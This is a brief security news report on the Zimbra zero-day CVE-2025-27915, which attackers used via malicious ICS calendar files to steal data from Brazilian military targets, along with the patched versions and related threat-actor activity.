A security flaw in Zimbra Collaboration tracked as CVE-2025-27915 (CVSS 5.4) that has since been patched was exploited as a zero-day earlier this year in attacks targeting the Brazilian military, according to a report by published by StrikeReady Labs.
StrikeReady said the in-the-wild activity involved threat actors spoofing the Libyan Navy’s Office of Protocol to deliver malicious ICS files to Brazilian military targets. The ICS file contained JavaScript designed to act as a data stealer that siphoned credentials, e-mails, contacts and shared folders to an external server, and which searched for messages in a specific folder and added e-mail filter rules named “Correo” to forward messages to [email protected], the report said.
The StrikeReady analysis also noted the script hid certain user interface elements and was coded to trigger only after more than three days since its last execution. Zimbra fixed the vulnerability in releases published on January 27, 2025: 9.0.0 Patch 44, 10.0.13 and 10.1.5, though the vendor advisory made no mention of exploitation in the wild.
Earlier this year, security firm ESET disclosed that the Russia-linked actor APT28 had exploited XSS flaws in a range of webmail solutions, including Zimbra, to gain unauthorized access. The use of mailed calendar entries to steal credentials or to install forwarding rules mirrors tactics attributed to other groups, including UNC1151, according to public reporting.
StrikeReady did not identify the operator behind the recent campaign and said attribution remained unclear.